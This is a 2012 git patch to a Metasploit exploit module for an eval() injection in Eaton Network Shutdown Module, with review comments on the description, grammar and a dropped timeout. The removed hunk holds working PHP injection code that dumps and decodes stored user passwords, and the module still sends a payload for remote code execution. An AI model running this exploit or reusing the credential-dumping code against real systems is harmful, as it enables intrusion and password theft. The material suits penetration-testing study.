From fd2296317dfb71f4f7b8cf8b7134ca24efe20954 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 28 Nov 2012 14:27:01 -0600 Subject: [PATCH] Strip the credential dumping stuff (making it auxiliary) Also a little description update --- .../multi/http/eaton_nsm_code_exec.rb | 64 ++++--------------- 1 file changed, 13 insertions(+), 51 deletions(-) diff --git a/modules/exploits/multi/http/eaton_nsm_code_exec.rb b/modules/exploits/multi/http/eaton_nsm_code_exec.rb index b1aeac8ed2..fe56105af3 100644 --- a/modules/exploits/multi/http/eaton_nsm_code_exec.rb +++ b/modules/exploits/multi/http/eaton_nsm_code_exec.rb @@ -18,12 +18,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability in lib/dbtools.inc which uses unsanitized user input inside a eval() call. Additionally the base64 encoded - user credentials are extracted from the database of the application. - + user credentials are extracted from the database of the application. Please + note that in order to be able to steal credentials, the vulnerable service + must have at least one USV module (an entry in the "nodes" table in mgedb.db) }, 'Author' => [ 'h0ng10' ], # original discovery, msf module 'License' => MSF_LICENSE, - 'Version' => '$Revision$', + 'Version' => '$Revision$', 'References' => [ ['OSVDB', '83199'], @@ -33,22 +34,20 @@ class Metasploit3 < Msf::Exploit::Remote { 'DisableNops' => true, 'Space' => 4000, - 'Keys' => ['php'] + 'Keys' => ['php'] }, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, - 'Targets' => [[ 'Automatic', { }]], + 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0, - 'Privileged' => true, + 'Privileged' => true, 'DisclosureDate' => 'Jun 26 2012' - )) + )) register_options( [ - Opt::RPORT(4679), - OptBool.new('READ_CREDS', [ true, 'Extract credentials from the target db', true ]), - + Opt::RPORT(4679) ], self.class) end 
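Review bot: The updated 'Description' still states that the base64-encoded user credentials are extracted from the database, and the new sentence adds a precondition for stealing them, yet this same commit deletes `read_credentials` and the `READ_CREDS` option (second hunk, `- OptBool.new('READ_CREDS', ...)`), so the text now documents behaviour the module no longer has. Since the subject line says the dumping moved to an auxiliary module, drop the credential sentences here or replace them with a pointer such as `Credential extraction has been moved to a separate auxiliary module (see <AUXILIARY_MODULE_PATH>).`; if the "at least one USV module" precondition also applies to code execution, reword it to say that. While editing, `a eval()` should read `an eval()`. The `'Version'`, `'Keys'`, `'Platform'`, `'Arch'`, `'Targets'`, `'Privileged'` and `))` lines in these two hunks appear to change only whitespace; noting that in the commit message would explain the otherwise puzzling remove/re-add pairs.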
@@ -65,42 +64,6 @@ class Metasploit3 < Msf::Exploit::Remote
 return CheckCode::Safe
 end
 
- def read_credentials()
- pattern = rand_text_numeric(10)
- users_var = rand_text_alpha(10)
- user_var = rand_text_alpha(10)
- php = <<-EOT
- $#{users_var} = &queryDB("SELECT * FROM configUsers;");
- foreach($#{users_var} as $#{user_var}) {
- print "#{pattern}" .$#{user_var}["login"]."#{pattern}".base64_decode($#{user_var}["pwd"])."#{pattern}";
- } die();
- EOT
-
- print_status("Reading user credentials from the database")
- response = execute_php_code(php)
-
- if not response or response.code != 200 then
- print_error("Failed: Error requesting page")
- return
- end
-
- credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/)
-
- return if credentials.length == 0
- print_status("Got #{credentials.length} record(s):")
- cred_txt = "#Username:Password\n"
- credentials.each do |record|
- print_status("Username: #{record[0]}, Password: #{record[1]}")
- cred_txt << "#{record[0]}:#{record[1]}\n"
- end
-
- loot_name = "eaton.nsm.credentials"
- loot_type = "text/plain"
- loot_filename = "eaton_nsm_creds.txt"
- loot_desc = "Eaton Network Shutdown Module credentials"
- store_loot(loot_name, loot_type, datastore['RHOST'], cred_txt, loot_filename, loot_desc)
- end
-
 def execute_php_code(code, opts = {})
 param_name = rand_text_alpha(6)
 padding = rand_text_alpha(6)
@@ -123,13 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote
 {
 'Connection' => 'Close',
 }
- }, 5)
+ })
 res
 end
 
 def exploit
- read_credentials unless datastore['READ_CREDS'] == false
- print_status("Sending payload")
+ print_status("#{rhost}:#{rport} - Sending payload")
 execute_php_code(payload.encoded)
 handler
 end
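Review bot: Changing `}, 5)` to `})` in `execute_php_code` silently drops the explicit 5-second timeout on the request that carries the payload, and neither the code nor the commit message says why; the request call itself begins outside the hunk. Because the payload is eval()'d inside that request, the HTTP call presumably returns only when the payload exits or the timeout fires, so `exploit` may now block for the HTTP mixin's default timeout before reaching `handler`. If the longer wait is intended (e.g. 5 seconds was too short for slow targets), a one-line comment on the call would spare the next reader the question: `# no explicit timeout: the request blocks while the PHP payload runs, so rely on the mixin default`. The removal of `read_credentials` is consistent with the dropped `READ_CREDS` option; the preceding hunk is a pure deletion and needs no further change.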